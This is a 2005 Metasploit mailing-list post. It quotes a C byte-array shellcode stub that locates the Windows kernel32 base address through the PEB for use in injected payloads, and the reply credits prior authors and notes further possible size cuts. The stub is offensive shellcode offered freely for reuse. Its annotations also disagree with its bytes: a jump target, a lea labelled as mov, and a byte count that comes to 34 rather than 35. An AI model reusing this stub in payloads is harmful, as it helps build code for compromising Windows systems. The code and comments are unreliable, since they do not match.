Metasploit mailing list archives

Previous By Date Next
Previous By Thread Next

Windows 9x/NT/2k/XP PEB method 35 bytes

From: mmiller at hick.org (mmiller at hick.org)
Date: Sun, 9 Jan 2005 14:12:46 -0600
On Sun, Jan 09, 2005 at 08:52:13PM +0100, Jerome ATHIAS wrote:

/*This is a 35 byte C implementation of the use of the PEB method to get
*the kernel32 base address on Windows. This is generic code designed to
*run on both Windows 9x and NT based systems. The code has been optimized
*to not have any 00h bytes so that you wont have to use an XOR routine to
*encode the shellcode. I used relative jumps and xor tricks to avoid the
*00h bytes and make the code as small as I could get it. Feel free to use
*this source in anything that you want.
*/


Credit should be given where credit is due.  This approach for looking
up the kernel32 base address has been in use for quite some time.  To my
knowledge dino from LSD and the VX scene were the first to make use of
this technique.
 

/* 35 byte PEB method for Windows 9x/NT/2k/XP
*  0x00 byte optimized, no XOR routine required.
*
*  www.4x10m.com
*  oc.192
*  irc.4x10m.net #4x10m
*/

unsigned char shellcode[] =
/*  35 byte PEB - 00h removal and size optimized  */
/*      22 - 24 total clock cycles on a x486      */
"\x31\xC0"                  /* xor eax, eax       */
"\x31\xD2"                  /* xor edx, edx       */
"\xB2\x30"                  /* mov dl, 30h        */
"\x64\x8B\x02"              /* mov eax, [fs:edx]  */      /* PEB base 
address */
"\x85\xC0"                  /* test eax, eax      */
"\x78\xC0"                  /* js 0Ch             */
"\x8B\x40\x0C"              /* mov eax, [eax+0Ch] */      /* NT kernel32 
routine */
"\x8B\x70\x1C"              /* mov esi, [eax+1Ch] */
"\xAD"                      /* lodsd              */
"\x8B\x40\x08"              /* mov eax, [eax+08h] */
"\xEB\x07"                  /* jmp short 09h      */
"\x8B\x40\x34"              /* mov eax, [eax+34h] */      /* 9x kernel32 
routine */
"\x8D\x40\x7C"              /* lea eax, [eax+7Ch] */
"\x8D\x40\x3C"              /* mov eax, [eax+3Ch] */
;


The above code can be optimized by a number of bytes (at least 3) and
still avoid NULL bytes.  Please reference some of the win32 payloads 
included in metasploit or search for 'PEB resolution' on google to see
how.
Previous By Date Next
Previous By Thread Next

Current thread: